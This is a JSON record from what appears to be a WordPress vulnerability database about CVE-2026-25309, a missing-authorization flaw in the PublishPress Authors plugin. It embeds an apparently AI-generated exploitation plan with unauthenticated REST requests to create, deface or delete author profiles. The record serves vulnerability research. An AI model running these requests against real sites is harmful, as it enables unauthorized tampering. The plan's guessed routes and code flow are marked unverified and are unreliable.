[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_wtBkR9HNGKJAMbRs1tRQcTR2_Tz4zobVrni1-qASuA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-25309","co-authors-multiple-authors-and-guest-authors-in-an-author-box-with-publishpress-authors-missing-authorization","Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors \u003C= 4.10.1 - Missing Authorization","The Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.10.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.","publishpress-authors",null,"\u003C=4.10.1","4.11.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-17 00:00:00","2026-03-27 20:26:26",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3ff3c560-26b6-4139-97dc-670ea9b8bb33?source=api-prod",11,[22,23,24,25,26,27,28,29],"CHANGELOG.md","defines.php","languages\u002Fpublishpress-authors-es_ES.po","languages\u002Fpublishpress-authors-fr_FR.po","languages\u002Fpublishpress-authors-it_IT.po","lib\u002Fvendor\u002Fcomposer\u002Finstalled.json","lib\u002Fvendor\u002Fcomposer\u002Finstalled.php","lib\u002Fvendor\u002Fpublishpress\u002Fpsr-container\u002Flib\u002FVersions.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-25309 (PublishPress Authors)\n\n## 1. Vulnerability Summary\nThe **PublishPress Authors** plugin (\u003C= 4.10.1) contains a missing authorization vulnerability in its REST API implementation. Specifically, the REST API endpoints introduced in version 4.8.0 to \"create and update Authors and their fields\" (identified in the changelog as feature #2065) do not implement sufficient capability checks. This allow unauthenticated attackers to create, modify, or delete author profiles (Guest Authors), which are stored as `ppma_author` custom post type objects.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** WordPress REST API.\n- **Base Route:** `\u002Fwp-json\u002Fpublishpress-authors\u002Fv1`\n- **Resource Route:** `\u002Fauthors` or `\u002Fauthor`\n- **HTTP Methods:** `POST` (Create), `PUT` \u002F `PATCH` (Update), `DELETE` (Delete).\n- **Vulnerable Parameter:** The entire JSON body for creating\u002Fupdating author profiles.\n- **Authentication:** None required (Unauthenticated).\n- **Preconditions:** The plugin must be active. Guest Author functionality is typically enabled by default.\n\n## 3. Code Flow\n1. **Registration:** The plugin registers REST routes during the `rest_api_init` hook. Based on the 4.8.0 changelog, a controller class (likely within `src\u002Fcore\u002FClasses\u002F` or `src\u002Fcore\u002FRest\u002F`) registers routes for author management.\n2. **Missing Check:** Within the `register_rest_route` call for the authors endpoint, the `permission_callback` is either missing, set to `__return_true`, or fails to verify if the requester has the `edit_posts` or `manage_options` capability.\n3. **Execution:** The handler function (e.g., `create_item` or `update_item`) processes the input and uses `wp_insert_post` or internal plugin methods (like those in `src\u002Fcore\u002FClasses\u002FAuthor_Editor.php`) to save the `ppma_author` data without verifying user permissions.\n\n## 4. Nonce Acquisition Strategy\nREST API endpoints in WordPress typically require a `wp_rest` nonce for authenticated sessions to prevent CSRF. However, for **unauthenticated** access to a route where `permission_callback` is `__return_true`, the nonce check is often bypassed or not enforced by the REST server for the \"anonymous\" user.\n\nIf a nonce is strictly required:\n1. **Identify Exposure:** The plugin may expose a REST nonce via `wp_localize_script` to support its block editor or author box features.\n2. **Shortcode Strategy:**\n   - Create a page with the author list shortcode: `[publishpress_authors_list]`\n   - `wp post create --post_type=page --post_status=publish --post_title=\"Authors\" --post_content='[publishpress_authors_list]'`\n3. **Extraction:**\n   - Navigate to the new page.\n   - Use `browser_eval` to find the nonce: `browser_eval(\"window.ppAuthorsData?.rest_nonce\")` or check for common PublishPress localization objects like `window.publishpressAuthorsConfig`.\n\n## 5. Exploitation Strategy\nWe will attempt to create a new Guest Author profile via the REST API.\n\n### Step 1: Discover the exact REST route\nPerform a GET request to the REST index to confirm the available routes for the plugin.\n- **Method:** `GET`\n- **URL:** `\u002Fwp-json\u002Fpublishpress-authors\u002Fv1`\n- **Tool:** `http_request`\n\n### Step 2: Create a Guest Author\n- **Method:** `POST`\n- **URL:** `\u002Fwp-json\u002Fpublishpress-authors\u002Fv1\u002Fauthors` (or `\u002Fauthor`)\n- **Headers:** \n    - `Content-Type: application\u002Fjson`\n- **Body (JSON):**\n```json\n{\n    \"title\": \"Injected Author\",\n    \"description\": \"This author was created via CVE-2026-25309.\",\n    \"email\": \"attacker@example.com\",\n    \"slug\": \"hacked-author\",\n    \"first_name\": \"Hacked\",\n    \"last_name\": \"Author\"\n}\n```\n\n### Step 3: Update an Existing Author (If creation fails)\nIf creation is restricted but update is not, attempt to overwrite an existing Guest Author (ID can be found by listing authors).\n- **Method:** `POST` or `PUT`\n- **URL:** `\u002Fwp-json\u002Fpublishpress-authors\u002Fv1\u002Fauthors\u002F\u003CID>`\n- **Body (JSON):**\n```json\n{\n    \"description\": \"Defaced bio\"\n}\n```\n\n## 6. Test Data Setup\n1. Ensure PublishPress Authors is installed and active on version 4.10.1.\n2. Create at least one post and assign it to a Guest Author via the WP Admin to ensure the `ppma_author` post type is initialized and a legitimate target exists.\n3. (Optional) Create a page with the `[publishpress_authors_list]` shortcode to facilitate nonce discovery if needed.\n\n## 7. Expected Results\n- **Success:** The server returns a `201 Created` or `200 OK` response with a JSON object representing the newly created or modified author.\n- **Data Persistence:** A new post of type `ppma_author` will exist in the database with the title \"Injected Author\".\n\n## 8. Verification Steps\nAfter the exploit, verify via WP-CLI:\n```bash\n# List all Guest Authors to see the injected one\nwp post list --post_type=ppma_author\n\n# Check the specific content of the injected author\nwp post get $(wp post list --post_type=ppma_author --name=hacked-author --format=ids) --fields=post_title,post_content\n```\n\n## 9. Alternative Approaches\n- **Metadata Manipulation:** If the REST API allows updating `meta` fields, try to map the Guest Author to a real Administrator's user ID by updating the `mapped_user_id` meta field.\n- **AJAX Endpoint:** If the REST API is protected, check for the AJAX action `ppma_author_create_or_update` (inferred name) which might be registered via `wp_ajax_nopriv_`.\n- **Author Deletion:** Attempt a `DELETE` request to `\u002Fwp-json\u002Fpublishpress-authors\u002Fv1\u002Fauthors\u002F\u003CID>` to verify if unauthorized deletion is possible, causing a Denial of Service for author profiles.","gemini-3-flash-preview","2026-04-18 03:07:14","2026-04-18 03:07:39",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","4.10.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpublishpress-authors\u002Ftags\u002F4.10.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpublishpress-authors.4.10.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpublishpress-authors\u002Ftags\u002F4.11.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpublishpress-authors.4.11.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpublishpress-authors\u002Ftags"]